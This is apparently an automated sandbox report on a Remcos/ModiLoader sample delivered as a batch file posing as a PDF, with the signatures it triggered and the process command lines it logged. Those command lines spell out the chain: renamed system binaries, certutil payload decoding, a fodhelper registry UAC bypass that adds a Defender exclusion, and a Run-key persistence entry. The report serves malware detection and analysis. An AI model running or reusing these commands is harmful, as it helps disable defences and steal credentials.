Analysis Overview
SHA256
d8a2540d2a73aad003319a27da2bc446f9f2970e0f9566c6b29fed61cba00cb6
Threat Level: Known bad
The file d8a2540d2a73aad003319a27da2bc446f9f2970e0f9566c6b29fed61cba00cb6.unknown was found to be: Known bad.
Malicious Activity Summary
Remcos
ModiLoader, DBatLoader
NirSoft MailPassView
ModiLoader Second Stage
Nirsoft
Detects executables built or packed with MPress PE compressor
Detects executables referencing many email and collaboration clients. Observed in information stealers
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers
NirSoft WebBrowserPassView
Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Accesses Microsoft Outlook accounts
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
Suspicious use of WriteProcessMemory
Suspicious behavior: CmdExeWriteProcessMemorySpam
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Kills process with taskkill
Modifies registry key
Suspicious use of SetWindowsHookEx
Script User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-27 02:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-27 02:42
Reported
2024-03-27 02:45
Platform
win7-20231129-en
Max time kernel
121s
Max time network
142s
Command Line
Signatures
ModiLoader, DBatLoader
Remcos
Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects executables built or packed with MPress PE compressor
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Lewxa.com | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows \System32\6614357.exe | N/A |
| N/A | N/A | C:\Windows \System32\6614357.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Koomxsve = "C:\\Users\\Public\\Koomxsve.url" | C:\Users\Public\Libraries\Lewxa.com | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1808 set thread context of 17860 | N/A | C:\Windows\SysWOW64\SndVol.exe | |
| PID 1808 set thread context of 33896 | N/A | C:\Windows\SysWOW64\SndVol.exe | |
| PID 1808 set thread context of 49952 | N/A | C:\Windows\SysWOW64\SndVol.exe | |
| PID 1808 set thread context of 66016 | N/A | C:\Windows\SysWOW64\SndVol.exe | |
| PID 1808 set thread context of 81980 | N/A | C:\Windows\SysWOW64\SndVol.exe | |
| PID 1808 set thread context of 98032 | N/A | C:\Windows\SysWOW64\SndVol.exe | |
| PID 1808 set thread context of 114036 | N/A | C:\Windows\SysWOW64\SndVol.exe | |
| PID 1808 set thread context of 130084 | N/A | C:\Windows\SysWOW64\SndVol.exe | |
| PID 1808 set thread context of 146144 | N/A | C:\Windows\SysWOW64\SndVol.exe | |
| PID 1808 set thread context of 162196 | N/A | C:\Windows\SysWOW64\SndVol.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | C:\Windows\SysWOW64\SndVol.exe |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Libraries\Lewxa.com | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | N/A | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat"
C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DEBIT_ADVICE_000610PAY001522024.PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows "
C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "\\?\C:\Windows \System32"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Windows \System32\6614357.exe"
C:\Windows \System32\6614357.exe
"C:\Windows \System32\6614357.exe"
C:\Windows \System32\6614357.exe
"C:\Windows \System32\6614357.exe"
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Lewxa.com C:\\Users\\Public\\Libraries\\Koomxsve.PIF
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\System32\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\tapoixibyy"
